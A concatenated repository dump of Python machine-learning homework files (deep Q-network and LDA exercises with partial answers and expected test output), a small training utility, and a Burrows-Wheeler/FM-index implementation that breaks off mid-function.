nosetests -v test3.py:test_update_parameters
--- OR ----
python3 -m nose -v test3.py:test_update_parameters
--- OR ----
python -m nose -v test3.py:test_update_parameters
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training: Train Q Network on a mini-batch of samples) Given a mini-batch of training samples: S (current game states), A (actions chosen), S_new (new/next game states) and R (immediate rewards), suppose the target Q values are already computed (Qt), please train the Q network using gradient descent: update the weights W and biases b using the gradients on the mini-batch of data samples.
---- Inputs: --------
* S: the current states for a mini-batch of sampled game steps, a torch tensor of shape (n,p), where S[i] is the current game state in the i-th sample in the mini-batch.
* A: a mini-batch of the actions chosen by the player, an integer vector of length (n).
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for all the parameters in the model (W and b).
---- Hints: --------
* Step 1 Forward pass: compute estimated Q values, target Q values and the loss L.
* Step 2 Back propagation: compute the gradients of W and b.
* Step 3 Gradient descent: update the parameters W and b using gradient descent.
* This problem can be solved using 4 line(s) of code.
'''
#---------------------
def update_Q(S, A, Qt, W, b, optimizer):
#########################################
## INSERT YOUR CODE HERE (5 points)
#########################################
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_update_Q
--- OR ----
python3 -m nose -v test3.py:test_update_Q
--- OR ----
python -m nose -v test3.py:test_update_Q
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: using Q network for playing the game) Given the Q network with parameters W and b and we have only the current states s in the game. Please compute the estimated Q values on the current game state.
---- Inputs: --------
* s: the current state of the game, a torch vector of length p.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
---- Outputs: --------
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
---- Hints: --------
* You could re-use the compute_Q() function above by creating a mini-batch of only one sample.
* To add a dimension to a torch tensor, you could use unsqueeze() function in torch tensor.
* To delete a dimension to a torch tensor, you could use squeeze() function in torch tensor.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def predict_q(s, W, b):
#########################################
## INSERT YOUR CODE HERE (3 points)
#########################################
return q
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_predict_q
--- OR ----
python3 -m nose -v test3.py:test_predict_q
--- OR ----
python -m nose -v test3.py:test_predict_q
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: Policy 1: greedy on Q) Given the Q values estimated by the Q network on the current game state s, choose an action using greedy policy on the Q values. Choose the action with the largest Q value for state s.
---- Inputs: --------
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
---- Outputs: --------
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
---- Hints: --------
* You could us the argmax() function in torch to return the index of the largest value in a vector.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def greedy_policy(q):
#########################################
## INSERT YOUR CODE HERE (2 points)
a = np.argmax(q.detach())
#########################################
return a
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_greedy_policy
--- OR ----
python3 -m nose -v test3.py:test_greedy_policy
--- OR ----
python -m nose -v test3.py:test_greedy_policy
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: Policy 2: epsilon-greedy on Q) Given the Q values estimated by the Q network on the current game state s, choose an action using epsilon-greedy policy on the Q values.
---- Inputs: --------
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
* e: (epsilon) the probability of the player to follow the random policy in epsilon-greedy method. e is a float scalar between 0 and 1. The player has 1-e probability in each time step to follow the greedy policy on the Q values.
---- Outputs: --------
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
---- Hints: --------
* You could re-use the random_policy() implemented in problem 2.
* You could use the random.rand() function in numpy to sample a number randomly using uniform distribution between 0 and 1.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def egreedy_policy(q, e):
#########################################
## INSERT YOUR CODE HERE (3 points)
a = random_policy(q.shape[0]) if np.random.random() < e else np.argmax(q.detach())
#########################################
return a
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_egreedy_policy
--- OR ----
python3 -m nose -v test3.py:test_egreedy_policy
--- OR ----
python -m nose -v test3.py:test_egreedy_policy
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Sampling: Sample an action) Given the current game state s, sample an action using epsilon-greedy method on the Q values estimated by the Q network. We have epsilon probability to follow the random policy (randomly pick an action with uniform distribution) and (1-epsilon) probability to follow the greedy policy on Q values (pick the action according to the largest Q value for the current game state s).
---- Inputs: --------
* s: the current state of the game, a torch vector of length p.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* e: (epsilon) the probability of the player to follow the random policy in epsilon-greedy method. e is a float scalar between 0 and 1. The player has 1-e probability in each time step to follow the greedy policy on the Q values.
---- Outputs: --------
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
---- Hints: --------
* (Step 1) use the Q network to predict the Q values for the current game state.
* (Step 2) use epsilon-greedy policy on the Q values to sample an action.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def sample_action(s, W, b, e):
#########################################
## INSERT YOUR CODE HERE (8 points)
#########################################
return a
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_sample_action
--- OR ----
python3 -m nose -v test3.py:test_sample_action
--- OR ----
python -m nose -v test3.py:test_sample_action
---------------------------------------------------
'''
#--------------------------------------------
'''
TEST problem 3:
Now you can test the correctness of all the above functions by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py
--- OR ----
python3 -m nose -v test3.py
--- OR ----
python -m nose -v test3.py
---------------------------------------------------
If your code passed all the tests, you will see the following message in the terminal:
----------- Problem 3 (35 points in total)--------------------- ... ok
* (2 points) compute_Q ... ok
* (5 points) compute_Qt ... ok
* (5 points) compute_L ... ok
* (2 points) update_parameters ... ok
* (5 points) update_Q ... ok
* (3 points) predict_q ... ok
* (2 points) greedy_policy ... ok
* (3 points) egreedy_policy ... ok
* (8 points) sample_action ... ok
----------------------------------------------------------------------
Ran 9 tests in 4.785s
OK
'''
#--------------------------------------------
#--------------------------------------------
'''
List of All Variables
* n: the number of game-step samples in a mini-batch, an integer scalar.
* p: the number of features in a game state, an integer scalar.
* c: the number of possible actions in the game, an integer scalar.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* L: the average of the least square losses on a mini-batch of training images, a torch float scalar.
* lr: learning rate for gradient descent, a float scalar, between 0 and 1.
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for all the parameters in the model (W and b).
* Q: the predicted Q values by the Q network on all actions for a mini-batch of game state samples, a pytorch matrix of shape (n, c). Q[i,j] represents the Q value on the j-th action for the i-th sample in the mini-batch.
* Q_new: the Q values (estimated by the target Q network) on the new game states for a mini-batch of sampled game steps, a pytorch matrix of shape (n, c). Q_new[i,j] represents the Q value on the j-th action for the new game state in the i-th sample of the mini-batch.
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
* gamma: the discount factor, a float scalar between 0 and 1.
* e: (epsilon) the probability of the player to follow the random policy in epsilon-greedy method. e is a float scalar between 0 and 1. The player has 1-e probability in each time step to follow the greedy policy on the Q values.
* S: the current states for a mini-batch of sampled game steps, a torch tensor of shape (n,p), where S[i] is the current game state in the i-th sample in the mini-batch.
* S_new: the new/next game states for a mini-batch of sampled games steps after state transition, a torch tensor of shape (n,p). S_new[i] is the next/new game state in the i-th sample of the mini-batch.
* R: a mini-batch of the immediate rewards returned after the transition, a float vector of length (n). R[i] is the received immediate reward of the i-th sampled game step in the mini-batch.
* A: a mini-batch of the actions chosen by the player, an integer vector of length (n).
* T: whether or not the new/next game state is a terminal state in a mini-batch of sampled games steps, a boolean torch tensor of length n. T[i]= True if S_new[i] is a terminal state in the game (where the game ends).
* s: the current state of the game, a torch vector of length p.
'''
#--------------------------------------------
```
#### File: CS-539-Machine-Learning/homework5/problem3.py
```python
import numpy as np
import problem2 as p2
from scipy.special import psi,polygamma
from scipy.linalg import inv
# Note: please don't import any new package. You should solve this problem using only the package(s) above.
#-------------------------------------------------------------------------
'''
Problem 3: LDA (Latent Dirichlet Allocation) using Variational EM method (40 points)
In this problem, we will implement the Latent Dirichlet Allocation (variational EM solution) to model text documents
A list of all variables being used in this problem is provided at the end of this file.
'''
#----------------------------------------------------
'''
Let's start by building some utility functions. Compute the digamma function, which is the gradient of the log Gamma function. If the input (x) is scalar value, the output (dx) is the digamma value on x; If the input (x) is a vector, the output dx is a vector, where each element is the digamma value of the corresponding element in vector x.
---- Inputs: --------
* x_g: the input to the digamma function, a float scalar or a numpy vector.
---- Outputs: --------
* dx_g: the output of the digamma function, a float scalar or a numpy vector.
---- Hints: --------
* You could use a function in scipy package to compute digamma function.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_digamma(x_g):
#########################################
## INSERT YOUR CODE HERE (4 points)
dx_g = psi(x_g)
#########################################
return dx_g
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_digamma
--- OR ----
python3 -m nose -v test3.py:test_compute_digamma
--- OR ----
python -m nose -v test3.py:test_compute_digamma
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Phi with 1 word in 1 document) Given a word ID (w) in a document (d), the current model parameters (Beta) and the variational parameters (gamma_d) in the document (d), update the variational parameter phi_w for the word (w) in the text document (d).
---- Inputs: --------
* w: the ID of a word in the vocabulary, an integer scalar, which can be 0,1, ..., or v-1.
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
---- Outputs: --------
* phi_w: the variational parameter (phi) of a categorical distribution to generate the topic (z) of a word (w) in a document, a numpy float vector of length c. phi_w[i] represents the probability of generating the i-th topic for word (w) in the document.
---- Hints: --------
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_phi_w(w, Beta, gamma_d):
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return phi_w
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_phi_w
--- OR ----
python3 -m nose -v test3.py:test_compute_phi_w
--- OR ----
python -m nose -v test3.py:test_compute_phi_w
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Phi with all the words in 1 document) Given the current model parameters (Beta) and the variational parameters (gamma_d) on a document (d), update the variational parameter Phi in the document (d).
---- Inputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
---- Outputs: --------
* phi_d: the variational parameters (phi) of a list of categorical distributions to generate the topic (z) in one document, a numpy float matrix of shape m by c. Each row represents the parameters of a categorical distribution to generate different topics in one word in the document; phi_d[i,j] represents the probability of generating the j-th topic for the i-th word.
---- Hints: --------
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_phi_d(Beta, gamma_d):
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return phi_d
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_phi_d
--- OR ----
python3 -m nose -v test3.py:test_compute_phi_d
--- OR ----
python -m nose -v test3.py:test_compute_phi_d
---------------------------------------------------
'''
#----------------------------------------------------
'''
(E-Step: Update Phi on all words in all documents) Given the current model parameters (Beta) and the variational parameters (Gamma) in all the documents, update the variational parameters Phi in all documents.
---- Inputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
---- Outputs: --------
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Phi(Beta, Gamma):
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return Phi
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Phi
--- OR ----
python3 -m nose -v test3.py:test_compute_Phi
--- OR ----
python -m nose -v test3.py:test_compute_Phi
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Gamma in 1 document) Given the variational parameters (phi_d) on a text document, update the variational parameter gamma_d on the document.
---- Inputs: --------
* phi_d: the variational parameters (phi) of a list of categorical distributions to generate the topic (z) in one document, a numpy float matrix of shape m by c. Each row represents the parameters of a categorical distribution to generate different topics in one word in the document; phi_d[i,j] represents the probability of generating the j-th topic for the i-th word.
* C_d: word frequency counts in a text document, an integer numpy vector of length v; C[i] represents how many times the i-th word in the vocabulary has been used in the document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
---- Outputs: --------
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_gamma_d(phi_d, C_d, Alpha):
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return gamma_d
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_gamma_d
--- OR ----
python3 -m nose -v test3.py:test_compute_gamma_d
--- OR ----
python -m nose -v test3.py:test_compute_gamma_d
---------------------------------------------------
'''
#----------------------------------------------------
'''
(E-step: Update Gamma in all documents) Given the variational parameters (Phi) on all text documents, update the variational parameters Gamma on all documents.
---- Inputs: --------
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
---- Outputs: --------
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Gamma(Phi, C, Alpha):
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return Gamma
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Gamma
--- OR ----
python3 -m nose -v test3.py:test_compute_Gamma
--- OR ----
python -m nose -v test3.py:test_compute_Gamma
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Expectation Step of EM algorithm) Given the current model parameters (Alpha and Beta), compute the optimal values for variational parameters (Phi and Gamma).
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* n_iter_var: the number of iterations for iteratively updating Phi and Gamma during variational inference.
---- Outputs: --------
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
---- Hints: --------
* (Step 1) update Phi with Gamma.
* (Step 2) update Gamma with Phi.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def E_step(C, Alpha, Beta, n_iter_var=20):
n = C.shape[0] # n documents
c, v = Beta.shape # c topics, v words in the vocabulary
#initialize variational parameters
Gamma = np.ones((n,c))*Alpha
for _ in range(n_iter_var): #repeat multiple passes
pass #no operation (you can ignore this line)
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return Phi, Gamma
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_E_step
--- OR ----
python3 -m nose -v test3.py:test_E_step
--- OR ----
python -m nose -v test3.py:test_E_step
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Parameter Beta on the t-th topic) Given a collection of text documents, represented as word-frequency format (C), and inferred topic distributions (Phi), please compute the maximum likelihood solution of the parameter Beta on the t-th topic: the word distribution of the t-th topic, i.e., the conditional probabilities of P(W|T=t).
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* phi_t: the variational parameters (phi) of a list of categorical distributions to generate the t-th topic in all words of all document, a numpy float matrix of shape n by v. phi_d[i,j] represents the probability of generating the t-th topic for the word ID=j in the i-th document.
---- Outputs: --------
* beta_t: the word probability distribution for one topic (t), a float numpy vector of length v; beta_t[i] represents the probability P(W=i | T =t), which is the conditional probability of generating the i-th word in the vocabulary in the topic (t).
---- Hints: --------
* You could use some function in the previous problem to solve this question.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_beta_t(C, phi_t):
#########################################
## INSERT YOUR CODE HERE (4 points)
beta_t = p2.compute_beta_t(C, phi_t)
#########################################
return beta_t
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_beta_t
--- OR ----
python3 -m nose -v test3.py:test_compute_beta_t
--- OR ----
python -m nose -v test3.py:test_compute_beta_t
---------------------------------------------------
'''
#----------------------------------------------------
'''
(M-step: Computing word distribution of each topic) Given a collection of text documents, represented as word-frequency format (C), and inferred topic distributions (Phi), please compute the maximum likelihood solution of the parameter Beta: the word distribution of each topic, i.e., the conditional probabilities of P(W|T).
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
---- Outputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
---- Hints: --------
* You could use some function in the previous problem to solve this question.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Beta(C, Phi):
#########################################
## INSERT YOUR CODE HERE (4 points)
Beta = p2.compute_Beta(C, Phi)
#########################################
return Beta
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Beta
--- OR ----
python3 -m nose -v test3.py:test_compute_Beta
--- OR ----
python -m nose -v test3.py:test_compute_Beta
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Variational EM method for LDA Model) Given the word counts of a set of documents, optimize the model parameters (Beta) using Variational EM.
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
* n_iter_var: the number of iterations for iteratively updating Phi and Gamma during variational inference.
* n_iter_EM: the number of iterations for EM algorithm.
---- Outputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
---- Hints: --------
* Step 1 (E step): Compute Phi and Gamma based upon the current values of Alpha and Beta.
* Step 2 (M step): update the parameter Beta based upon the new values of Phi and Gamma.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def LDA(C, Alpha, n_iter_var=20, n_iter_EM=10):
c = len(Alpha)
v = C.shape[1]
Beta = np.random.rand(c,v) # initialize Beta
Beta = Beta/Beta.sum(1,keepdims=True)
for _ in range(n_iter_EM): # repeat multiple iterations of E and M steps
pass # you could ignore this line
#########################################
## INSERT YOUR CODE HERE (4 points)
#########################################
return Beta
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_LDA
--- OR ----
python3 -m nose -v test3.py:test_LDA
--- OR ----
python -m nose -v test3.py:test_LDA
---------------------------------------------------
'''
#--------------------------------------------
'''
TEST problem 3:
Now you can test the correctness of all the above functions by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py
--- OR ----
python3 -m nose -v test3.py
--- OR ----
python -m nose -v test3.py
---------------------------------------------------
If your code passed all the tests, you will see the following message in the terminal:
----------- Problem 3 (40 points in total)--------------------- ... ok
* (4 points) compute_digamma ... ok
* (4 points) compute_phi_w ... ok
* (4 points) compute_phi_d ... ok
* (4 points) compute_Phi ... ok
* (4 points) compute_gamma_d ... ok
* (4 points) compute_Gamma ... ok
* (4 points) E_step ... ok
* (4 points) compute_beta_t ... ok
* (4 points) compute_Beta ... ok
* (4 points) LDA ... ok
----------------------------------------------------------------------
Ran 10 tests in 0.586s
OK
'''
#--------------------------------------------
#--------------------------------------------
'''
List of All Variables
* n: the number of text documents in the dataset, an integer scalar.
* v: the number of possible words in the vocabulary, an integer scalar.
* c: the number of possible topics (categories) in the model, an integer scalar.
* x_g: the input to the digamma function, a float scalar or a numpy vector.
* dx_g: the output of the digamma function, a float scalar or a numpy vector.
* w: the ID of a word in the vocabulary, an integer scalar, which can be 0,1, ..., or v-1.
* C_d: word frequency counts in a text document, an integer numpy vector of length v; C[i] represents how many times the i-th word in the vocabulary has been used in the document.
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
* beta_t: the word probability distribution for one topic (t), a float numpy vector of length v; beta_t[i] represents the probability P(W=i | T =t), which is the conditional probability of generating the i-th word in the vocabulary in the topic (t).
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* phi_w: the variational parameter (phi) of a categorical distribution to generate the topic (z) of a word (w) in a document, a numpy float vector of length c. phi_w[i] represents the probability of generating the i-th topic for word (w) in the document.
* phi_d: the variational parameters (phi) of a list of categorical distributions to generate the topic (z) in one document, a numpy float matrix of shape m by c. Each row represents the parameters of a categorical distribution to generate different topics in one word in the document; phi_d[i,j] represents the probability of generating the j-th topic for the i-th word.
* phi_t: the variational parameters (phi) of a list of categorical distributions to generate the t-th topic in all words of all document, a numpy float matrix of shape n by v. phi_d[i,j] represents the probability of generating the t-th topic for the word ID=j in the i-th document.
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
* n_iter_var: the number of iterations for iteratively updating Phi and Gamma during variational inference.
* n_iter_EM: the number of iterations for EM algorithm.
'''
#--------------------------------------------
``` |
{
"source": "jojonki/AttentionNetworks-for-QA",
"score": 3
} |
#### File: jojonki/AttentionNetworks-for-QA/config.py
```python
class Config(object):
def __init__(self, **entries):
self.__dict__.update(entries)
``` |
{
"source": "jojonki/BabyNet",
"score": 3
} |
#### File: BabyNet/common/trainer.py
```python
import matplotlib.pyplot as plt
import numpy as np
import time
class Trainer:
def __init__(self, model, optimizer):
self.model = model
self.optimizer = optimizer
self.loss_list = []
self.eval_interval = None
self.current_epoch = 0
def fit(self, x, t, max_epoch=10, batch_size=32, max_grad=None, eval_interval=20):
data_size = len(x)
max_iters = data_size // batch_size
self.eval_interval = eval_interval
model, optimizer = self.model, self.optimizer
total_loss = 0
loss_count = 0
start_time = time.time()
for epoch in range(max_epoch):
idx = np.random.permutation(np.arange(data_size))
x = x[idx]
t = t[idx]
for iters in range(max_iters):
batch_x = x[iters*batch_size:(iters+1)*batch_size]
batch_t = t[iters*batch_size:(iters+1)*batch_size]
loss = model.forward(batch_x, batch_t)
model.backward()
params, grads = model.params, model.grads
# TODO clip max_grad if it's specified
optimizer.update(params, grads)
total_loss += loss
loss_count += 1
if (eval_interval is not None) and (iters % eval_interval) == 0:
avg_loss = total_loss / loss_count
elapsed_time = time.time() - start_time
print('| epoch %d | iter %d / %d | time %d[s] | loss %.2f'
% (self.current_epoch + 1, iters + 1, max_iters, elapsed_time, avg_loss))
self.loss_list.append(float(avg_loss))
total_loss, loss_count = 0, 0
def plot(self, ylim=None):
x = np.arange(len(self.loss_list))
if ylim is not None:
plt.ylim(*ylim)
plt.plot(x, self.loss_list, label='train')
plt.xlabel('iterations (x' + str(self.eval_interval) + ')')
plt.ylabel('loss')
plt.show()
``` |
{
"source": "jojonki/BWT",
"score": 2
} |
#### File: jojonki/BWT/fm_index.py
```python
import sys
from tqdm import tqdm
from itertools import groupby
from operator import itemgetter
class FMIndex:
# ref https://www.cs.jhu.edu/~langmea/resources/lecture_notes/bwt_and_fm_index.pdf
def __init__(self):
self.marker = '$'
def encode(self, text):
self.text_len = len(text)
print('get sa...')
sa, _, _ = self.suffix_array(text)
self.sa = sa # TODO reduce memory footprint
print('get bwt...')
self.bwt = self.bwt_via_sa(text, sa)
return self.bwt, self.sa
def set_dict(self, data):
if 'bwt' in data:
self.bwt = data['bwt']
if 'sa' in data:
self.sa = data['sa']
if 'text_len' in data:
self.text_len = data['text_len']
if 'ch_count' in data:
self.ch_count = data['ch_count']
def decode(self, bwt):
ranks, ch_count = self.rank_bwt(bwt)
self.ch_count = ch_count
first = self.first_col(ch_count)
t = self.marker
row_i = 0
while bwt[row_i] != self.marker:
c = bwt[row_i]
t = c + t
row_i = first[c][0] + ranks[row_i]
assert (len(t) - 1) == self.text_len
if t[-1] == self.marker:
t = t[:-1]
return t
# def suffix_array(self, t):
# print('----1', len(t), ', size', sys.getsizeof(t))
#
#
# sfxes = [t[i:] for i in tqdm(range(len(t)))]
# print('----2')
# # The first value [len(t)] is for marker '$'
# # Force to set '$' to the 0th position
# return [len(t)] + [i[0] for i in sorted(enumerate(sfxes), key=lambda x:x[1])]
def longest_common_substring(self, text):
"""Get the longest common substrings and their positions.
>>> longest_common_substring('banana')
{'ana': [1, 3]}
>>> text = "not so Agamemnon, who spoke fiercely to "
>>> sorted(longest_common_substring(text).items())
[(' s', [3, 21]), ('no', [0, 13]), ('o ', [5, 20, 38])]
This function can be easy modified for any criteria, e.g. for searching ten
longest non overlapping repeated substrings.
"""
